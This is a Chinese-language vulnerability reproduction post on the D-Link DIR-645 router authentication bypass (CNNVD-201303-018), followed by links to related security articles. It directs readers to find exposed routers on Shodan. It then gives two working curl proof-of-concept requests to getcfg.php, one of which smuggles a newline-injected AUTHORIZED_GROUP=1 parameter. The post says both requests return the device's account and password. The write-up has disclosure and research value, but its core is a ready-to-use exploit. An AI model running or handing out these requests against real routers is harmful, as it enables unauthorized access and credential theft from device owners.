0x00 漏洞概述

友讯科技股份有限公司（D-Link Corporation）是一家台湾科技公司，总部位于台北市内湖区，于1986年由高次轩成立。公司专注于电脑网络设备的设计开发，自创“D-Link”品牌，主要生产制造消费者及企业所使用的无线网络和以太网硬件产品。

D-Link DIR-645是一款无线路由器。D-Link DIR-645路由器1.03之前的版本（不包含1.03）中存在远程认证绕过漏洞。远程攻击者利用该漏洞绕过身份验证机制进而获得未授权访问权限。在1.03 ~ 1.06版本中，虽然有权限的检查，但是由于cgibin程序中代码逻辑出现了问题，导致可绕过校验，实现泄露。

0x01 影响版本

DIR-645 < 1.03
1.03 ≤ DIR-645 ≤ 1.06

0x02 漏洞评级

高危

0x03 shodan搜索漏洞环境

本文以1.02和1.04版本为例子进行漏洞复现
使用shodan搜索"DIR-645"。

找到对应版本的漏洞环境。

0x04 漏洞验证

针对1.03之前版本（不包含1.03）的POC代码如下：

curl -d "SERVICES=DEVICE.ACCOUNT" "http://xx.xx.xx.xx/getcfg.php"

执行后可以成功获取到账号密码。

针对在1.03之后1.06之前版本（包含1.06）的POC代码如下：

curl -d "SERVICES=DEVICE.ACCOUNT&attack=ture%0aAUTHORIZED_GROUP=1" "http://xx.xx.xx.xx/getcfg.php"

执行后同样可以成功获取到账号密码。

0x05 修复建议

1、访问限制白名单
2、升级最新产品

【CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现相关推荐

CVE-2017-5521: Bypassing Authentication on NETGEAR Routers（Netgear认证绕过漏洞）
SpiderLabs昨天发布的漏洞, 用户访问路由器的web控制界面尝试身份验证,然后又取消身份验证,用户就会被重定向到一个页面暴露密码恢复的token.然后通过passwordrecovered.c ...
一个“登录框“引发的安全问题
前言搞安全的小伙伴只有一个登录框你都能测试哪些漏洞? 通常大家测试的都会测试关键部分,为了有更好的测试效果,小厂会提供给你用户名密码:但是一些比较重要的企业,而这个环境却是正式环境,里面存放着一些数 ...
Apache Qpid 认证绕过漏洞
漏洞名称: Apache Qpid 认证绕过漏洞 CNNVD编号: CNNVD-201303-222 发布时间: 2013-03-13 更新时间: 2013-03-13 危害等级: 漏洞类型: ...
无线路由器挖洞方法大比拼：白盒 or 黑盒？
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 ZDI 发布博客文章,比较了黑盒和白盒挖洞方法的优劣.如下是对文章的编译. 去年,我们披露了两个认证绕过漏洞 ZDI-20-1176 ...
学习笔记-B/S - Exploits
B/S - Exploits 免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲各类论坛/CMS框架 AEM 74CMS dedeC ...
一个登录框引发的“安全问题”
一个文本框可能存在哪些漏洞前言用户名枚举弱口令空口令登录认证绕过存在暴力破解风险图形验证码不失效短信验证码绕过短信验证码可暴力破解短信验证码可预测短信炸弹恶意锁定问题密码明文 ...
一个文本框可能存在哪些漏洞
一个文本框可能存在哪些漏洞前言用户名枚举弱口令空口令登录认证绕过存在暴力破解风险图形验证码不失效短信验证码绕过短信验证码可暴力破解短信验证码可预测短信炸弹恶意锁定问题密码明文 ...
基于Armitage的MSF自动化集成攻击实践
基于Armitage的MSF自动化集成攻击实践目录 0x01 实践环境 0x02 预备知识 0x03 Armitage基础配置 0x04 Nmap:Armitage下信息搜集与漏洞扫描 0x05 A ...
BMC 历史漏洞汇总
刚开始接触 BMC 以为研究的人比较少,感觉一般人也没有机会接触到.尤其是服务器风扇的声音,一般人也不想去碰.去查了一下 CVE 之后,发现有不少漏洞,还挺多人玩的.近期也在研究这一块,把 BMC 曾 ...

【CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现

目录